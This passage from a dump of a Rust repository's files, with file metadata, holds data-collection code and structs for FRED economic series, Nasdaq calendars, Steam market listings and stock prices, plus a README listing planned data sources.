self.updated_at.to_string(),\n ]\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Headline {\n pub text: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Intraday {\n // #[serde(flatten)]\n pub ticker: String,\n pub previous_closing_price_one_trading_day_ago: ::serde_json::Value,\n pub open_price: ::serde_json::Value,\n pub range: Option<Range>,\n pub price: Vec<Price>,\n pub volume: Vec<Volume>,\n}\n\nimpl crate::HasRecs for Intraday {\n fn price_records(&self) -> Vec<Vec<String>> {\n self.price.iter().map(|x| x.to_rec()).collect()\n }\n\nimpl Intraday {\n pub fn volume_records(&self) -> Vec<Vec<String>> {\n let mut ret = vec![];\n for i in 0..self.volume.len() {\n ret.push(vec![\n self.volume[i].date_time.to_string(),\n self.volume[i].value.to_string(),\n ]);\n }\n ret\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Range {\n pub start: String,\n pub end: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Price {\n pub date_time: String,\n pub value: f64,\n}\n\nimpl Price {\n pub fn to_rec(&self) -> Vec<String> {\n return vec![self.date_time.to_string(), self.value.to_string()];\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Volume {\n pub date_time: String,\n pub value: i64,\n}\n" }, { "alpha_fraction": 0.5329750776290894, "alphanum_fraction": 0.5417684316635132, "avg_line_length": 28.774545669555664, "blob_id": "9acc14ed810c45c1265d160ea0949538c7b3b777", "content_id": "d4ae6bda485b1a482bf42181be733d405498f11d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 8188, "license_type": "no_license", "max_line_length": 100, "num_lines": 275, "path": "/finox/src/bin/fred.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "//extern crate regex;\nextern crate reqwest;\nextern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\nextern crate tokio;\nextern crate url;\n//use lazy_static::lazy_static;\n//use regex::Regex;\n\nuse finox::keys::FRED_KEYS;\nuse std::{\n collections::HashMap,\n env,\n path::Path,\n //thread,\n //rc::{Rc, Weak},\n time,\n};\nuse url::Url;\n\npub const WRITE_PATH: &str = \"../data/fred/\";\npub const FRED_DELAY: time::Duration = time::Duration::from_secs(10);\n\n//fn extract_id(input: &str) -> Option<&str> {\n// lazy_static! {\n// static ref RE: Regex = Regex::new(r\"id=(?P<id>\\w*)&\").unwrap();\n// }\n// RE.captures(input)\n// .and_then(|cap| cap.name(\"id\").map(|login| login.as_str()))\n//\n//}\n\n#[tokio::main]\nasync fn main() -> Result<(), reqwest::Error> {\n let args: Vec<String> = env::args().collect();\n if args.len() != 2 {\n panic!(\n \"provide 's' or 'o' as second arg, for 'o' you need a fred_series_id.txt in ref_data/\"\n );\n }\n // how do you\n match args[1].as_ref() {\n \"c\" => {\n /*\n * 1. for bfs we want\n */\n //let mut cat_ids = vec![];\n let path = \"category/children\";\n let query = \"category_id=\";\n let mut all_recs: Vec<Vec<String>> = vec![];\n\n let depth: usize = 4;\n\n let mut to_visit: Vec<String> = vec![\n \"32991\", \"10\", \"32992\", \"1\", \"32455\", \"32263\", \"3008\", \"33060\",\n ]\n .iter()\n .map(|x| x.to_string())\n .collect();\n for _ in 0..depth {\n //let id = to_visit.pop().unwrap();\n let hm = gen_queries(path, query, to_visit.clone());\n let vals = hm.values().map(|x| x.to_string()).collect::<Vec<String>>();\n if let Ok(recs) = finox::fetch::<CategoryChildrenRoot>(vals.clone()).await {\n all_recs.append(&mut recs.clone());\n to_visit = recs\n .iter()\n .map(|x| x.clone()[0].to_string())\n .collect::<Vec<String>>();\n\n println!(\"recs for category #: {:#?}\", recs.len());\n println!(\"to_visit #: {:#?}\", to_visit.len());\n } else {\n println!(\"{:?}\", vals);\n }\n }\n\n println!(\"all recs: #{}\", all_recs.len());\n finox::roses::write_csv(\n Path::new(\"../data/fred/categories.csv\"),\n all_recs,\n &CATEGORY_HEADER,\n )\n .expect(\"csv prob\");\n }\n\n \"s\" => {\n let ids = finox::roses::read_tickers(\"../ref_data/fred_category_ids.txt\");\n let hm = gen_queries(\"category/series\", \"category_id=\", ids);\n if let Ok(res) =\n finox::fetch_write::<CategoryRoot>(hm, \"../data/fred/series/\", &SERIES_HEADER).await\n {\n println!(\"series Ok #{:#?}\", res.len());\n }\n }\n \"o\" => {\n let ids = finox::roses::read_tickers(\"../ref_data/fred_series_ids.txt\");\n let hm = gen_queries(\"series/observations\", \"series_id=\", ids);\n if let Ok(res) =\n finox::fetch_write::<SeriesObsRoot>(hm, \"../data/fred/observations/\", &OBS_HEADER)\n .await\n {\n println!(\"obs res Ok #{:#?}\", res.len());\n }\n }\n _ => panic!(\"'s' or 'o' for series or observation as 2nd command line arg\"),\n };\n Ok(())\n}\n\nfn gen_queries(path: &str, q: &str, ids: Vec<String>) -> HashMap<String, String>\n//-> Vec<url::Url>\n{\n let mut queries = HashMap::new();\n for (i, id) in ids.iter().enumerate() {\n queries.insert(\n id.to_string(),\n fred_fmt(path, q, id, FRED_KEYS[i % FRED_KEYS.len()]).to_string(),\n );\n //.collect::<Vec<url::Url>>()\n }\n queries\n}\n\nfn fred_fmt(path: &str, query: &str, id: &str, key: &str) -> Url {\n let root = Url::parse(\"https://api.stlouisfed.org\").expect(\"url prob\");\n\n let q = format!(\n \"fred/{}?{}{}&api_key={}&file_type=json\", //&limit=10000\",\n path, query, id, key,\n );\n let url = root.join(&q).expect(\"url parsed wrong\");\n println!(\"{:#?}\", url);\n return url;\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct CategoryRoot {\n pub realtime_start: String,\n pub realtime_end: String,\n pub order_by: String,\n pub sort_order: String,\n pub count: i64,\n pub offset: i64,\n pub limit: i64,\n pub seriess: Vec<Series>,\n}\n\nimpl finox::HasRecs for CategoryRoot {\n fn to_recs(&self) -> Vec<Vec<String>> {\n return self.seriess.iter().map(|x| x.to_rec()).collect::<Vec<_>>();\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct Series {\n pub id: String,\n pub realtime_start: String,\n pub realtime_end: String,\n pub title: String,\n pub observation_start: String,\n pub observation_end: String,\n pub frequency: String,\n pub frequency_short: String,\n pub units: String,\n pub units_short: String,\n pub seasonal_adjustment: String,\n pub seasonal_adjustment_short: String,\n pub last_updated: String,\n pub popularity: i64,\n pub group_popularity: i64,\n pub notes: String,\n}\n\nimpl Series {\n fn to_rec(&self) -> Vec<String> {\n return vec![\n self.id.to_string(),\n self.title.to_string(),\n self.observation_start.to_string(),\n self.observation_end.to_string(),\n self.frequency_short.to_string(),\n self.units_short.to_string(),\n self.seasonal_adjustment_short.to_string(),\n self.last_updated.to_string(),\n self.popularity.to_string(),\n self.group_popularity.to_string(),\n self.notes.to_string(), // fix to just grab source code\n ];\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct SeriesObsRoot {\n pub realtime_start: String,\n pub realtime_end: String,\n pub observation_start: String,\n pub observation_end: String,\n pub units: String,\n pub output_type: i64,\n pub file_type: String,\n pub order_by: String,\n pub sort_order: String,\n pub count: i64,\n pub offset: i64,\n pub limit: i64,\n pub observations: Vec<Observation>,\n}\n\nimpl finox::HasRecs for SeriesObsRoot {\n fn to_recs(&self) -> Vec<Vec<String>> {\n return self\n .observations\n .iter()\n .map(|x| x.to_rec())\n .collect::<Vec<_>>();\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct Observation {\n pub realtime_start: String,\n pub realtime_end: String,\n pub date: String,\n pub value: String,\n}\n\nimpl Observation {\n fn to_rec(&self) -> Vec<String> {\n return vec![self.date.to_string(), self.value.to_string()];\n }\n}\n\npub const CATEGORY_HEADER: [&'static str; 2] = [\"id\", \"name\"];\n\npub const OBS_HEADER: [&'static str; 2] = [\"t\", \"x\"];\n\npub const SERIES_HEADER: [&'static str; 11] = [\n \"id\",\n \"title\",\n \"observation_start\",\n \"observation_end\",\n \"frequency_short\",\n \"units_short\",\n \"seasonal_adjustment_short\",\n \"last_updated\",\n \"popularity\",\n \"group_popularity\",\n \"notes\",\n];\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct CategoryChildrenRoot {\n pub categories: Vec<CategoryChild>,\n}\n\nimpl finox::HasRecs for CategoryChildrenRoot {\n fn to_recs(&self) -> Vec<Vec<String>> {\n self.categories.iter().map(|x| x.to_rec()).collect()\n }\n}\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct CategoryChild {\n pub id: i64,\n pub name: String,\n pub parent_id: i64,\n pub notes: Option<String>,\n}\n\nimpl CategoryChild {\n pub fn to_rec(&self) -> Vec<String> {\n vec![self.id.to_string(), self.name.to_string()]\n }\n}\n" }, { "alpha_fraction": 0.756302535533905, "alphanum_fraction": 0.756302535533905, "avg_line_length": 16, "blob_id": "bab3ec7d2ce3a08615e58a7f50126eb78c83623f", "content_id": "3a50023faed202159ab2db2f6410956acefafd71", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 119, "license_type": "no_license", "max_line_length": 21, "num_lines": 7, "path": "/finox/src/nasdaq.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "pub mod chart;\npub mod dividends;\npub mod gen;\npub mod info;\npub mod insiders;\npub mod option_chain;\npub mod realtime;\n" }, { "alpha_fraction": 0.6998313665390015, "alphanum_fraction": 0.7141652703285217, "avg_line_length": 29.35897445678711, "blob_id": "0fbe573d078de5174419432ab7501ac2909f76cb", "content_id": "33e8d87b30acc816dcd619c91ded8de589556d2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1186, "license_type": "no_license", "max_line_length": 234, "num_lines": 39, "path": "/finox/README.md", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "\n# Docs\n\n## Currently have:\n### Prices\n * yf\n * bloomberg\n * steam trades\n\n### News\n * nyt archive and feed\n * seeking alpha trending\n * wsj videos \n * JPX news \n\n## Todo:\n * remove duplicate code with generic typed functions\n * fred data\n * use a db, noria ideally\n * define schema\n * add logging \n * run on cloud \n * test stability \n * integrate with alpaca\n\n## api todos:\n * Guardian\n * FT\n\n\n### something else\n* using https://xueqiu.com/, seems like its providing public realtime data, \n\n* turns out [yahoo finance data](https://help.yahoo.com/kb/exchanges-data-providers-yahoo-finance-sln2310.html) is mostly 15 mins delayed, which is obviously unacceptable.\n\n* here are two of the nice endpoints they have [last twenty trade prices](https://stock.xueqiu.com/v5/stock/history/trade.json?symbol=FB&count=20) and [realtime price](https://stock.xueqiu.com/v5/stock/realtime/quotec.json?symbol=FB).\n* \n* next data to get is interest and reserve rates, and other fred data like cpi and gdp, which the govt has an api for. \n\n* database https://github.com/mit-pdos/noria running. this is a vid the creator gave at two sigma on noria https://youtu.be/s19G6n0UjsM?t=977.\n\n" }, { "alpha_fraction": 0.6141256093978882, "alphanum_fraction": 0.6229540705680847, "avg_line_length": 30.01230812072754, "blob_id": "906c99860ec95598e8ef25e7e593fdd23a091df4", "content_id": "5543217357ac4d315acd8396c259d171991829a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 10081, "license_type": "no_license", "max_line_length": 105, "num_lines": 325, "path": "/finox/src/misc/steam.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate csv;\nextern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\nuse std::collections::HashMap;\n\n\nuse crate::utils;\n/*\n\nhttps://steamcommunity.com/market/recent?country=US&language=english&currency=1 new listings\nhttps://steamcommunity.com/market/recentcompleted\n\nhttps://steamcommunity.com/market/itemordersactivity?country=US&language=english&currency=1&item_nameid=1\n*/\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Steam {\n pub success: bool,\n pub more: bool,\n #[serde(rename = \"results_html\")]\n pub results_html: ::serde_json::Value,\n pub listinginfo: HashMap<String, Listing>, //Listings\n pub purchaseinfo: Option<HashMap<String, Listing>>, //Purchases\n pub assets: Games,\n pub currency: ::serde_json::Value,\n pub hovers: String,\n #[serde(rename = \"app_data\")]\n pub app_data: AppDatas,\n #[serde(rename = \"last_time\")]\n pub last_time: i64,\n #[serde(rename = \"last_listing\")]\n pub last_listing: String,\n}\n\nimpl Steam {\n pub fn listings(&self) -> Vec<Vec<String>> {\n let mut recs: Vec<Vec<String>> = Vec::new();\n for (k, v) in self.listinginfo.iter() {\n recs.push(Listing::to_record(v));\n } \n return recs;\n }\n pub fn purchases(&self) -> Vec<Vec<String>> {\n let mut recs: Vec<Vec<String>> = Vec::new();\n for (k, v) in self.listinginfo.iter() {\n recs.push(Listing::to_record(v));\n } \n return recs;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Listings {\n #[serde(flatten)]\n listings: HashMap<String, String>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Listing {\n pub listingid: String,\n pub price: Option<i64>,\n pub fee: Option<i64>,\n #[serde(rename = \"publisher_fee_app\")]\n pub publisher_fee_app: Option<i64>,\n #[serde(rename = \"publisher_fee_percent\")]\n pub publisher_fee_percent: String,\n pub currencyid: ::serde_json::Value,\n #[serde(rename = \"steam_fee\")]\n pub steam_fee: Option<i64>,\n #[serde(rename = \"publisher_fee\")]\n pub publisher_fee: Option<i64>,\n #[serde(rename = \"converted_price\")]\n pub converted_price: Option<i64>,\n #[serde(rename = \"converted_fee\")]\n pub converted_fee: Option<i64>,\n #[serde(rename = \"converted_currencyid\")]\n pub converted_currencyid: Option<i64>,\n #[serde(rename = \"converted_steam_fee\")]\n pub converted_steam_fee: Option<i64>,\n #[serde(rename = \"converted_publisher_fee\")]\n pub converted_publisher_fee: Option<i64>,\n #[serde(rename = \"converted_price_per_unit\")]\n pub converted_price_per_unit: Option<i64>,\n #[serde(rename = \"converted_fee_per_unit\")]\n pub converted_fee_per_unit: Option<i64>,\n #[serde(rename = \"converted_steam_fee_per_unit\")]\n pub converted_steam_fee_per_unit: Option<i64>,\n #[serde(rename = \"converted_publisher_fee_per_unit\")]\n pub converted_publisher_fee_per_unit: Option<i64>,\n pub asset: Asset,\n}\n\nimpl Listing {\n pub fn to_record(&self) -> Vec<String> {\n let mut rec = vec!(\n self.listingid.to_string(),\n utils::lilmatcher_i64(self.fee.clone()),\n utils::lilmatcher_i64(self.price.clone()),\n utils::lilmatcher_i64(self.publisher_fee_app.clone()),\n self.publisher_fee_percent.clone(),\n self.currencyid.to_string(),\n );\n rec.append(&mut Asset::to_record(&self.asset));\n return rec;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Asset {\n pub currency: Option<i64>,\n pub appid: Option<i64>,\n pub contextid: Option<String>,\n pub id: Option<String>,\n pub classid: Option<String>,\n pub instanceid: Option<String>,\n pub amount: Option<String>,\n pub status: Option<i64>,\n #[serde(rename = \"original_amount\")]\n pub original_amount: Option<String>,\n #[serde(rename = \"unowned_id\")]\n pub unowned_id: Option<String>,\n #[serde(rename = \"unowned_contextid\")]\n pub unowned_contextid: Option<String>,\n #[serde(rename = \"background_color\")]\n pub background_color: Option<String>,\n #[serde(rename = \"icon_url\")]\n pub icon_url: Option<String>,\n #[serde(rename = \"icon_url_large\")]\n pub icon_url_large: Option<String>,\n pub descriptions: Option<Vec<Description>>,\n pub tradable: Option<i64>,\n #[serde(rename = \"owner_actions\")]\n pub owner_actions: Option<Vec<OwnerAction>>,\n pub name: Option<String>,\n pub name_color: Option<String>,\n #[serde(rename = \"type\")]\n pub type_field: Option<String>,\n #[serde(rename = \"market_name\")]\n pub market_name: Option<String>,\n #[serde(rename = \"market_hash_name\")]\n pub market_hash_name: Option<String>,\n #[serde(rename = \"market_fee_app\")]\n pub market_fee_app: Option<i64>,\n pub commodity: Option<i64>,\n #[serde(rename = \"market_tradable_restriction\")]\n pub market_tradable_restriction: Option<i64>,\n #[serde(rename = \"market_marketable_restriction\")]\n pub market_marketable_restriction: Option<i64>,\n #[serde(rename = \"market_actions\")]\n pub market_actions: Option<::serde_json::Value>,\n pub marketable: Option<i64>,\n #[serde(rename = \"app_icon\")]\n pub app_icon: Option<String>,\n pub owner: Option<i64>,\n #[serde(rename = \"new_id\")]\n pub new_id: Option<String>,\n #[serde(rename = \"new_contextid\")]\n pub new_contextid: Option<String>,\n}\n\nimpl Asset {\n pub fn to_record(&self) -> Vec<String> {\n let rec: Vec<String> = vec!(\n utils::lilmatcher(self.id.clone()),\n utils::lilmatcher(self.name.clone()),\n utils::lilmatcher_i64(self.appid.clone()),\n utils::lilmatcher(self.amount.clone()),\n utils::lilmatcher_i64(self.status.clone()),\n utils::lilmatcher_i64(self.currency.clone()),\n utils::lilmatcher_i64(self.tradable.clone()),\n );\n return rec;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Description {\n #[serde(rename = \"type\")]\n pub type_field: String,\n pub value: String,\n pub color: Option<String>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct OwnerAction {\n pub link: String,\n pub name: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Games {\n #[serde(flatten)]\n games: HashMap<String, AssetMap>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct AssetMap {\n #[serde(flatten)]\n assetmap: HashMap<String, Asset>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Purchase {\n pub listingid: String,\n pub purchaseid: String,\n #[serde(rename = \"paid_amount\")]\n pub paid_amount: i64,\n #[serde(rename = \"paid_fee\")]\n pub paid_fee: i64,\n pub currencyid: String,\n #[serde(rename = \"steam_fee\")]\n pub steam_fee: i64,\n #[serde(rename = \"publisher_fee\")]\n pub publisher_fee: i64,\n #[serde(rename = \"publisher_fee_percent\")]\n pub publisher_fee_percent: String,\n #[serde(rename = \"publisher_fee_app\")]\n pub publisher_fee_app: i64,\n pub asset: Asset,\n}\n\nimpl Purchase {\n pub fn to_record(&self) -> Vec<String> {\n let mut rec = vec!(\n self.listingid.to_string(),\n self.purchaseid.to_string(),\n self.paid_amount.to_string(),\n self.paid_fee.to_string(),\n self.steam_fee.to_string(),\n self.publisher_fee.to_string(),\n self.publisher_fee_app.to_string(),\n self.publisher_fee_percent.to_string(),\n );\n rec.append(&mut Asset::to_record(&self.asset));\n return rec;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct SteamAppData {\n pub appid: i64,\n pub name: String,\n pub icon: String,\n pub link: String,\n}\n\nimpl SteamAppData {\n pub fn to_record(&self) -> Vec<String> {\n let rec = vec!(\n self.appid.to_string(),\n self.name.to_string(),\n );\n return rec;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct AppDatas {\n #[serde(flatten)]\n gamedata: HashMap<String, SteamAppData>,\n}\n\n// pub const STEAM_ASSET_HEADER: [&'static str; 6] = [];\npub const STEAM_LISTING_HEADER: [&'static str; 6] = [\n \"l_id\",\n \"l_price\",\n \"l_fee\",\n \"l_pub_fee_app\",\n \"l_pub_fee_pct\",\n \"l_currency_id\",\n];\n\n// pub const STEAM_ASSET_HEADER: [&'static str; 6] = [];\npub const STEAM_PURCHASE_HEADER: [&'static str; 8] = [\n \"p_listing_id\",\n \"p_id\",\n \"p_paid_amt\",\n \"p_paid_fee\",\n \"p_cur_id\",\n \"p_steam_fee\",\n \"p_pub_fee\",\n \"p_pub_fee_pct\",\n];\n\npub const STEAM_ASSET_HEADER: [&'static str; 7] = [\n \"a_id\",\n \"a_name\",\n \"a_appid\",\n \"a_amount\",\n \"a_status\",\n \"a_currency\",\n \"a_tradable\",\n];\n\n// pub const STEAM_ASSET_HEADER: [&'static str; 6] = [];\npub const STEAM_PURCHASE_HEADER2: [&'static str; 15] = [\n \"p_listing_id\",\n \"p_id\",\n \"p_paid_amt\",\n \"p_paid_fee\",\n \"p_cur_id\",\n \"p_steam_fee\",\n \"p_pub_fee\",\n \"p_pub_fee_pct\",\n \"a_id\",\n \"a_name\",\n \"a_appid\",\n \"a_amount\",\n \"a_status\",\n \"a_currency\",\n \"a_tradable\",\n];\n// pub const STEAM_PURCHASE_HEADER: [&'static str; 6] = [];\n\n\n" }, { "alpha_fraction": 0.6960651278495789, "alphanum_fraction": 0.7006444931030273, "avg_line_length": 30.51871681213379, "blob_id": "38053bb82a26236f7256bdb8c413691108471e50", "content_id": "c6e926415a387c32f4b292f784141c707a66b6ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 5896, "license_type": "no_license", "max_line_length": 95, "num_lines": 187, "path": "/finox/src/nasdaq/cal.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "/*\nftp://ftp.nasdaqtrader.com/SymbolDirectory/\n\nftp://ftp.nasdaqtrader.com/SymbolDirectory/bondslist.txt\nftp://ftp.nasdaqtrader.com/SymbolDirectory/bxoptions.txt\n\nhttps://api.nasdaq.com/api/quote/EURUSD/summary?assetclass=currencies\n\n*/\n\n//https://api.nasdaq.com/api/calendar/upcoming\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct CalendarRoot {\n pub data: Vec<Daum>,\n pub message: ::serde_json::Value,\n pub status: gen::Status,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Daum {\n pub splits_list: Option<Vec<SplitsList>>,\n pub name: String,\n pub event_count: i64,\n pub earnings_list: Option<Vec<EarningsList>>,\n pub dividends_list: Option<Vec<DividendsList>>,\n pub econs_list: Option<Vec<EconsList>>,\n pub ipos_list: Option<Vec<IposList>>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct SplitsList {\n pub company_name: String,\n pub execution_date: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct EarningsList {\n pub company_name: String,\n pub date: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct DividendsList {\n pub company_name: String,\n pub ex_div_date: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct EconsList {\n pub event_name: String,\n pub time: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct IposList {\n pub company_name: String,\n pub price: String,\n}\n\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Root {\n pub data: Data,\n pub message: ::serde_json::Value,\n pub status: gen::Status,\n}\n\n//https://api.nasdaq.com/api/ipo/calendar?date=2020-04\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Data {\n pub priced: Priced,\n pub upcoming: Upcoming,\n pub filed: Filed,\n pub withdrawn: Withdrawn,\n pub month: i64,\n pub year: i64,\n pub total_results: i64,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Priced {\n pub headers: ::serde_json::Value, //Headers,\n pub rows: Vec<Row>,\n}\n\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Row {\n #[serde(rename = \"dealID\")]\n pub deal_id: String,\n pub proposed_ticker_symbol: String,\n pub company_name: String,\n pub proposed_exchange: String,\n pub proposed_share_price: String,\n pub shares_offered: String,\n pub priced_date: String,\n pub dollar_value_of_shares_offered: String,\n pub deal_status: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Upcoming {\n pub upcoming_table: UpcomingTable,\n pub last_updated_time: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct UpcomingTable {\n pub headers: ::serde_json::Value, //Headers2,\n pub rows: Vec<Row2>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Row2 {\n #[serde(rename = \"dealID\")]\n pub deal_id: String,\n pub proposed_ticker_symbol: String,\n pub company_name: String,\n pub proposed_exchange: String,\n pub proposed_share_price: String,\n pub shares_offered: String,\n pub expected_price_date: String,\n pub dollar_value_of_shares_offered: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Filed {\n pub headers: ::serde_json::Value, //Headers3,\n pub rows: Vec<Row3>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Row3 {\n #[serde(rename = \"dealID\")]\n pub deal_id: String,\n pub proposed_ticker_symbol: Option<String>,\n pub company_name: String,\n pub filed_date: String,\n pub dollar_value_of_shares_offered: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Withdrawn {\n pub headers: ::serde_json::Value, //Headers4,\n pub rows: Vec<Row4>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Row4 {\n #[serde(rename = \"dealID\")]\n pub deal_id: String,\n pub proposed_ticker_symbol: ::serde_json::Value,\n pub company_name: String,\n pub proposed_exchange: ::serde_json::Value,\n pub shares_offered: String,\n pub filed_date: String,\n pub dollar_value_of_shares_offered: String,\n pub withdraw_date: String,\n}\n\n//https://www.nasdaq.com/api/v1/recent-articles/undefined/500\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct NewsRoot {\n pub title: String,\n pub url: String,\n pub ago: String,\n}\n\n\n" }, { "alpha_fraction": 0.5927860736846924, "alphanum_fraction": 0.6113184094429016, "avg_line_length": 29.454545974731445, "blob_id": "6e167580a85f064e431c12179cda276e362c3a15", "content_id": "3586251ab849c06353036fa7abd5974578570609", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 8040, "license_type": "no_license", "max_line_length": 309, "num_lines": 264, "path": "/finox/src/misc/xueqiu.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\n\nuse crate::utils;\n// MSFT,AAPL,AMZN,GOOGL,BABA,FB,BRKA,JNJ,WMT,V,PG,JPM,TSM,UNH,MA,INTC,VZ,HD,T,MRK,KO,PFE,NVS,BAC,DIS,PEP,NFLX,XOM,CSCO,NVDA,TM,CMCSA,ORCL,ABT,ADBE,CVX,CHL,LLY,SAP,NKE,TSLA,MDT,MCD,BMY,RDSA.AS,AZN,PYPL,TMO,PM,NEE\n// 